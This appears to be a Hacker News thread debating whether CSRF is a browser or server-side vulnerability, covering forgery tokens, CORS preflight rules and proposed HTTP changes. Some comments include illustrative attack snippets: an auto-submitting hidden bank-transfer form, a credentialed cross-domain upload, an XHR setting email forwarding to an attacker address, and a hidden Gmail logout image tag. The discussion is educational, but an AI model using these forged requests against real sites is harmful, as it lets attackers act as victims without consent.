
CSRF isn't a browser vulnerability. It's a serverside application vulnerability.

To say otherwise is to say that there is some trivial policy, just an HTTP header away, that would allow IE, Firefox, and Webkit to coherently express cross-domain request policy for every conceivable application --- or to say that no FORM element on any website should be able to POST off-site (which, for the non-developers on HN, is an extremely common pattern).

There is a list (I am not particularly fond of it) managed by OWASP of the Top Ten vulnerabilities in application security. CSRF has been on it since at least 2007. For at least five years, the appsec community has been trying to educate application developers about CSRF.

Applications already have fine-grained controls for preventing CSRF. Homakov calls these controls "an ugly workaround". I can't argue about ugliness or elegance, but forgery tokens are fundamentally no less elegant than cryptographically secure cookies, which form the basis for virtually all application security on the entire Internet. The difference between browser-based CSRF protections (which don't exist) and token-based protections comes down to the "End-to-End Arguments in System Design" paper (also worth a Google). E2E suggests that when there are many options for implementing something, the best long-term solution is the one that pushes logic as far out to the edges as possible. Baking CSRF protection into the HTTP protocol is the opposite: it creates a "smart middleman" that will in the long term hamper security.
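To make the mechanics concrete, here's a minimal sketch of what a forgery token amounts to, in plain Node-style JavaScript (the session object and field name are hypothetical, not any particular framework's API): mint a random secret per session, embed it in every form you render, and reject any state-changing request that doesn't echo it back.

    // Minimal sketch of a per-session forgery token (hypothetical session store).
    var crypto = require('crypto');

    function issueToken(session) {
      if (!session.csrfToken) {
        session.csrfToken = crypto.randomBytes(32).toString('hex');
      }
      return session.csrfToken; // rendered into a hidden <input name="csrf_token">
    }

    function verifyToken(session, submitted) {
      // In practice you'd want a constant-time comparison here.
      return !!session.csrfToken && submitted === session.csrfToken;
    }

It's the same trick as a session cookie: a secret the attacker's page can never read, checked on the server.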

This blog post seems to suppose that most readers aren't even familiar with CSRF. From the comments on this thread, he may be right! But he's naive if he thinks Google wasn't aware of the logout CSRF, since it's been discussed ad nauseam on the Internet since at least 2008 (as the top of the first search result for [Google logout CSRF] would tell you). Presumably, the reason this hasn't been addressed is that Google is willing to accept the extremely low impact of users having to re-enter their passwords to get to Google.

Incidentally, I am, like Egor, a fan of Rails. But to suggest that Rails is the most advanced framework with respect to CSRF is to betray a lack of attention to every other popular framework in the field. ASP.NET has protected against CSRF for as long as there's been a MAC'd VIEWSTATE. Struts has a token. The Zend PHP framework provides a form authentication system; check out Stefan Esser's secure PHP development deck on their site. Django, of course, provides CSRF protection as a middleware module.



It's clear that developers need a simple way to specify that a piece of API should not be accessible from third-party sites.

I propose a new set of HTTP verbs, "SECPOST", "SECGET", etc., which come with the implication that they are never intended to be called by third-party sites or even navigated to from third-party sites. They name resources that can only be called from the same origin. Application developers (and framework authors) could make sure to implement their destructive/sensitive APIs behind those verbs, and browser vendors could make sure to prevent any and all CSRF on those verbs (including links and redirects).


Two things.

First, every mainstream web framework already comes with a simple-to-use way to block forged requests. Even if we adopted new HTTP verbs to give them a common name in the protocol, by the time developers are making decisions they're not working with the ALL-CAPS-NAMES-OF-HTTP-VERBS anyways.

Second, there isn't anything inherently "cross-site" about CSRF, so denying off-site POSTs isn't a complete solution to the problem either. Every site that accepts any form of user-generated content must deal with intra-site request forgery as well.

So no, I don't think that's a great idea.

The things that are insecure here are serverside web applications. Changes to the HTTP protocol or to browsers are a red herring. There's no way around it: web developers have to figure out how to write secure code.


Personally, I would be happy to eliminate any possibility of inter-site forgeries. It's unlikely that my bank will be putting user-generated content in front of me any time soon (and if they do I presume that they'll sanitize it well enough to not be a problem).

It troubles me deeply to have CSRF declared a purely server-side application problem. The browser is quite literally my agent in all of my interaction with the web. It is an extension of me, and when it does things that pretend to be me, that feels very wrong. That is why I propose new HTTP verbs: my browser should know (and verify) that when it sends out a SEC* request, my eyeballs are on that data and my finger physically clicked that button, and it can do this if those requests are, essentially, tagged as particularly sensitive.

To place the onus solely on the server side is for me to abrogate my responsibility to fully control my browser-as-agent. Frankly, even if the server successfully rejects forged attacks, it is not acceptable that my browser, acting as my trusted agent, attempted that attack in the first place.


There are 3 major browser codebases. There are hundreds of thousands of web applications, each with different security needs. I think it's lunacy to suggest that the browsers should take on this problem.

At any rate: there isn't going to be SECGET and SECPOST, so the academic argument over whether end-to-end is better than Apple, Mozilla, Google and Microsoft deciding amongst themselves how security is going to work for every web application is moot.


You are missing a critical point: users do not expect software that is under their control to do things that they did not tell it to do, using their credentials, acting as them. Even if all the server-side software in the world were to be secured against such attempts, there would still remain an underlying problem: loss of control of the browser.

While the vast majority of resource requests (both primary and secondary) are beneficial, some are not. The browser currently does not have enough information to make this distinction. New HTTP verbs would give the browser enough information to refuse to directly load damaging resources.


Again: request forgery isn't an intrinsically cross-domain problem. The HTTP protocol change you've proposed is already worse than the serverside solutions it's meant to supplant.

Serverside request forgery tokens don't rely on browser behavior to function. They provide a much simpler and more direct security model: to POST/PUT/DELETE to an endpoint, you must at least be able to read the contents of the token. This meshes with same-origin security.
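As a concrete illustration of "you must at least be able to read the contents of the token" (the endpoint and field names are made up; the meta tag convention is borrowed from Rails, not mandated by anything): a same-origin page can read the token out of its own markup and echo it back, while a page on another origin cannot.

    // Runs on the site's own pages: read the token the server embedded in the HTML
    // (e.g. a Rails-style <meta name="csrf-token"> tag) and send it with the request.
    var token = document.querySelector('meta[name="csrf-token"]').content;
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/settings/email');
    xhr.setRequestHeader('X-CSRF-Token', token);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send('email=me@example.com');
    // An attacker's page on another origin can make the browser *send* such a POST,
    // but same-origin policy prevents it from reading the victim's pages or cookies,
    // so it can never learn the token and the server drops the forged request.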


The loss of user agent control is a serious problem independent of whether or not a malicious request is accepted. The fact that the user agent crafted and sent the malicious request at all is a problem worth solving. But for some reason you seem to believe either that it doesn't matter that the UA is acting maliciously on users' behalf, that this is an inevitable consequence of the way the internet works, or that it's such a difficult problem to fix that you'd rather ignore it and focus on the server side. Or perhaps some combination of these.

Personally, I don't believe any of those things. Server authors should certainly take point on battling CSRF. But there is an important client-side piece to the puzzle that cannot be ignored. If users cannot even prevent their own browsers from attempting malicious actions on their behalf, then there is something critically wrong with browsers.


I'm actually quite curious about your viewpoint, and why it seems so difficult to shift - set in your ways, so to speak. So let me see if I can't let Charles Stross give it a try:

"You're right in principle, but you're right for the same reason and to the same limited extent as if you said "people have a responsibility to be aware of the locks on their front door and windows and to use them". Which is that you omit the other side of the social contract: we all have an obligation not to exploit our neighbors' negligence if they leave their door unlocked by burgling them."[1]

[1] http://www.antipope.org/charlie/blog-static/2012/03/not-an-a...


I have no idea what you are trying to say here. This is an engineering discussion, not a dorm room debate.

What you've tried to argue here is that we should add new HTTP verbs to express "this endpoint shouldn't allow cross-domain requests". Or, more generally, that we should add HTTP features to allow browsers to prevent CSRF attacks.

But CSRF isn't a browser security problem. It isn't even necessarily a cross-domain problem! (CSRF is in that respect misnamed.) The specific changes you've suggested would drastically change the HTTP protocol but couldn't even theoretically solve the request forgery problem, not just because of intra-site CSRF but because your suggested locked-down HTTP requests would also break otherwise viable apps --- meaning that many apps couldn't use these features even if they wanted to, and would have to rely on something else for CSRF protection.

The fact is that having browsers police request validity just doesn't make sense. Even if they could do that, they still obviously have to rely on serverside signals to determine whether a request is or isn't valid. If the serverside knows a request isn't valid, it already has the means to block it! Why on earth would the server punt this to the browser?

Your suggestions give the impression that you're not familiar with how CSRF protection works in apps today. It is almost a one-liner in many modern frameworks.


The thing that troubles me is not that you don't like the HTTP verb solution, but that you don't seem to accept the fact that there is a client-side problem to solve in the first place.

Your argument is equivalent to saying that websites should protect themselves from DDoS attacks - and that users should simply accept that their machines will be hacked and will become part of a botnet (or several botnets) at some point in time. In other words, DDoS is a server-side problem, not a client problem. Whereas I (and I think that most people) believe that it is our responsibility to use our computing resources responsibly, and work hard to avoid being included in a botnet.

You seem like a smart person, and I'm sure you have something to contribute to the client-side of this issue, but that won't happen until you are convinced that there is a client-side problem.

In any event, somewhat selfishly I suppose, I've found this discussion quite useful in clarifying my own views on the matter. So, thank you for violently disagreeing with me. :)


Request forgery is nothing like DDoS. I found the rest of your comment too vague to respond to. I can't rebut anything you've said without repeating myself.

You keep saying CSRF is a "client-side problem", but you haven't explained why you think that, other than that it's a problem that is occurring in a client-server system so somehow the client must be involved. That's flimsy logic.


> Request forgery is nothing like DDoS.

Forgery is like DDoS in that they both use the unwitting (and unwilling) compute resources of an intermediate victim to mount the attack. The unit of distribution of the DDoS case is a binary rootkit (for example) and the unit of distribution for a forgery attack is a web page.

The impacts of successful DDoS and CSRF attacks are very different, of course, but the mechanism used to carry them out is very similar. In particular, they both differ from an ordinary hacker-to-target penetration, DoS, forgery, etc. attack.


You didn't answer my question.


You didn't ask a question (was there a question mark in your post that I missed?). You did, however, make an assertion which I corrected.

In an honest, respectful discussion that would occasion a response along the lines of either: "Ah, I didn't think about it like that. Let me see about adjusting the line of my reasoning," or, "No, your correction is invalid because..."


I think you would enjoy the book _The Tangled Web_ by Michal Zalewski, of Google's browser & web security team.


Is the following accurate:

If a form is served from domain A (via GET) into an iframe on a page that was served from domain B, then the JS on the page from domain B is prevented from reading or writing data on the page from domain A (unless a cross-domain policy is in place), though it may still be able to POST to it.


Yes, it won't be able to read it. But that's not what attackers are after. What they want is to execute some user action on the server side, and that action will have taken place just by the browser making the GET/POST request.
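To make that concrete, the classic shape of the attack is just a hidden form on the attacker's page that the victim's browser submits automatically (the URL and field names below are made up):

    // Runs on the attacker's page; the victim only has to load it.
    var form = document.createElement('form');
    form.action = 'https://bank.example/transfer';
    form.method = 'POST';
    var amount = document.createElement('input');
    amount.type = 'hidden';
    amount.name = 'amount';
    amount.value = '1000';
    form.appendChild(amount);
    document.body.appendChild(form);
    // The browser attaches the victim's bank.example cookies to this POST.
    // The attacker never sees the response, but the action still happens
    // unless the server demands a forgery token the attacker couldn't read.
    form.submit();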


Thank you. I just wanted to make sure I understood the basis of why CSRF tokens work.


I see some points, but:

> CSRF isn't a browser vulnerability. It's a serverside application vulnerability.

You didn't prove this one. CSRF is a browser vulnerability. And I don't care about the other stuff you said further on - you're probably right that most popular frameworks have the protection out of the box - I know it, no surprise here :). But I did a pretty wide audit - only Rails' protection looks really elegant. Hm.. probably I'm too much of a Rails fan, true.

And, please:

> Baking CSRF protection into the HTTP protocol is the opposite: it creates a "smart middleman" that will in the long term hamper security.

Surely, I don't mean "stop securing your apps against CSRF, it's not your problem". I just want to make browsers think about the issue as millions of developers have to. Because it is their issue, they are in charge. But we are fixing it on the backend (and we will have to for the next 10 years, definitely).


CSRF is NOT a browser vulnerability. The browser is doing exactly what it's supposed to do: load content. The browser cannot (and should not) attempt to distinguish the "evil" HTTP requests from the "good" ones. The browser's job is to make requests.

Now, you could argue the browser's job should be to implement security features as well. It does, after all, implement the same-origin policy. But, if you think about it, there is no good way for the browser to fix the CSRF issue. You can ask the user, which is what's suggested, but that never really works. They'll do one of two things: click "okay" every single time, or stop using your browser.

I would guess well over half of all websites do one of the following: (1) load an external JS file, (2) load an external image, (3) load an external CSS file, (4) use an iframe which points to a different origin, (5) use a JS redirect, (6) use a meta redirect, or (7) open a new window.

The proposed "solution" to CSRF stops ALL of these use cases. The user would have to manually approve each and every one of them. Given that well under 1% of alerts would be true attacks, the user would almost definitely "okay" on the attacks as well: they would have been trained by thousands of other alerts that this is an acceptable thing to do.

There was a paper by Barth and Jackson on CSRF defenses where they propose an Origin header, but that's the extent to which security is implemented in the browser. It is fundamentally up to the web application to verify that the user did in fact initiate the request. No amount of code in the web browser can get around this fact.
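For illustration only (the allowed origin and helper name are made up, and this is not the paper's exact scheme): a server can refuse requests whose Origin header doesn't match its own site, but since plenty of legitimate requests carry no Origin header at all, tokens remain the real line of defense.

    // Rough sketch of a serverside Origin check (Node-style request object).
    function originLooksValid(req) {
      var origin = req.headers['origin'];
      // Older browsers and plain navigations may omit Origin entirely,
      // so this can only ever supplement a token check, not replace it.
      if (!origin) return false;
      return origin === 'https://www.example.com';
    }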


>I would guess well over half of all websites do one of the following: (1) load an external JS file, (2) load an external image, (3) load an external CSS file, (4) use an iframe which points to a different origin, (5) use a JS redirect, (6) use a meta redirect, or (7) open a new window. The proposed "solution" to CSRF breaks ALL of these uses.

You're definitely kidding me. Please point out where in my post I said to deny ALL requests. I was talking ONLY about POST requests. Probably I forgot to add it :) So, I'm talking only about form submissions, and GET is OK, sure.


Either you do it for everything, or you do it for only POST and you end up missing half of the vulnerabilities. Correct me if I'm wrong, but your CSRF attack used a GET request, did it not? [1]

Web applications make state-changing operations on GET requests. You might not like it, but they do.

[1] <img src="https://mail.google.com/mail/u/0/?logout" style="display: none;" />


>Web applications make state-changing operations on GET requests. You might not like it, but they do.

But when a developer makes a mistake with GET, it is 100% his problem - that's beyond question. He should be punished :D


Nonsensical. CSRF isn't God's punishment for REST-lessness.


You're both just choosing different places to draw the line between developer responsibility and browser responsibility.


That is like saying "you're both just suggesting two totally different designs for the HTTP security model".

His model is wrong. Again: I assume he wants to know that, so, bluntness.


Perfectly solid web apps routinely ask browsers to POST to other domains.


So rather than deny ALL requests, I think it would work if browsers merely stopped passing cookies on cross-site POST form submissions, no?

Then if 3rd party sites wanted to still use form submissions, they could use an auth token in the form (though I'm unsure why they would do this instead of using JSONP).


Firefox already blocks off-domain POST requests, unless the 3rd party domain responds to an OPTIONS preflight request.

> So, I'm talking only about form submissions, and GET is OK, sure.

Google's logout CSRF works because the logout link is a GET request. So, no, there is no quick fix.


No it does not.

---

https://developer.mozilla.org/en/http_access_control#Simple_...

A simple cross-site request is one that:

- Only uses GET or POST. If POST is used to send data to the server, the Content-Type of the data sent to the server with the HTTP POST request is one of application/x-www-form-urlencoded, multipart/form-data, or text/plain.

- Does not set custom headers with the HTTP Request (such as X-Modified, etc.)

---

This is actually a big deal, since it means you can send a cross-domain multipart POST with no preflight. That allows for an effective CSRF attack against file upload systems.
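For example (the target URL is made up), an attacker's page can build a multipart body with FormData and fire it cross-domain; the browser sends it immediately, cookies and all, with no OPTIONS request first:

    // Cross-domain multipart POST with no preflight ("simple" request under CORS).
    var body = new FormData();
    body.append('file', new Blob(['attacker-chosen contents']), 'evil.txt');
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://victim.example/upload');
    xhr.withCredentials = true; // send the victim's cookies along
    xhr.send(body);             // sent right away; the upload happens even though
                                // the response stays hidden from this page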

And of course, cross-domain POST requests via <form> tags have always worked and will continue to work.


Am I missing something here?

Let's say you're logged into Gmail and Gmail had no CSRF protection anywhere.

You're logged in while visiting my site. In my site, I include a little bit of JavaScript to make a POST request to Gmail telling it to forward copies of all your incoming email to my email address.

This will not work even without CSRF protection. It would only work if Google sends back the header Access-Control-Allow-Origin: mysite or Access-Control-Allow-Origin: * as noted in the section you linked to.

Of course, I could also try to trick you into filling out a form whose action actually points at Gmail and include all the hidden input tags to set you up for forwarding emails to me, but you would know something fishy is going on because it would redirect you to Gmail.


"This will not work even without CSRF protection."

It actually will work.

What you're describing is what's known as a "simple" request in XMLHttpRequest terms. That means there is no pre-flight necessary. Your browser will simply make the POST as requested and receive the response. It won't make the response available to you since the Access-Control-Allow-Origin header isn't set, but you're a malicious attacker in this example and you don't care what the response is: you just care that you were able to make the request. ;-)
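In code, the scenario you described looks something like this (the URL and parameters are invented; the point is only that the browser sends the request):

    // On the attacker's page, while the victim is logged in elsewhere.
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://mail.example/settings/forwarding');
    xhr.withCredentials = true; // include the victim's session cookie
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send('forward_to=attacker@evil.example');
    // A "simple" request: no preflight, the server processes it, and the missing
    // Access-Control-Allow-Origin header only hides the response from the attacker.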

You could even do this by creating an HTML form that POSTs to the right URL and using JavaScript to submit it automatically when the page loads. Same exact thing: no CORS checks.

If a pre-flight were necessary you would be right. The browser would send an OPTIONS request to the server, the server would respond without the appropriate headers, and the POST request would never be sent.

Let me know if any of this needs further explanation!


Oh, I see now. I had assumed that because I couldn't get the response, the request itself was blocked.

Thanks!


I would like to know one thing.

Who the hell thought it was a good idea to allow cross-domain XMLHttpRequests? Given that the standard says POST is for modification, no other website should ever make those requests.


The CORS standard for 'simple' POSTs is no different than what you can already submit via a form from a technological perspective. In that way, it actually makes a lot of sense.

And the whole point of CORS is that some websites do want to make those requests. ;-)


"I did pretty wide audit - only rails' protection looks really elegant."

This is handwaving. You were wrong about this. I assume you want to know that, so I'm saying it bluntly.

"I just want to make browsers think about the issue as millions of developers have to. Because it is their issue, they are in charge."

No, the web browsers are not in charge. The secrets and sensitive actions are occurring on the servers, not in the browsers. The servers are what matter. The browser isn't protecting your email. The server is. The browser isn't protecting your bank account. The server is. The browser isn't controlling who is or isn't your Facebook friend. The server is.


> The difference between browser-based CSRF protections (which don't exist)

What about the X-Frame-Options and Origin headers? They are browser-based mechanisms that give the server side a hint, right?

(not for the classic POST case though...)


Neal addressed XFO downthread:

http://news.ycombinator.com/item?id=3778700

Read his comment. It's great.



